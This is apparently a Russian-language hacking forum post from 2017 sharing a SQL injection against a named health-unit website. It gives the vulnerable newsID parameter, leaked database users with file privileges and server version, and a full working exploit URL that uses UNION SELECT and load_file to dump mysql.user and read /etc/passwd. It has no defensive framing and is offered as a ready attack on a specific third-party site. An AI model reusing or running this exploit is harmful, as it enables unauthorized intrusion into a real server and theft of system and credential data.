
22.05.2017, 20:27
|
|
Познающий
Регистрация: 09.05.2015
Сообщений: 40
С нами:
5797046
Репутация:
17
|
|
SQLi с чтением файла из файловой системы и file_priv Y
Сайт:eohu.ca
Уязвимый параметор: newsID через GET
root:Y,root:Y,root:Y,debian-sys-maint:Y,phpmyadmin:N,root:Y
root@localhost:5.1.49-1ubuntu8:debian-linux-gnu:x86_64
Эксплоит:
Код:
http://www.eohu.ca/news/view_news_e.php?newsID=-1' union all select group_concat(user,0x3a,file_priv),user(),load_file('/etc/passwd') from mysql.user --+
|
|
|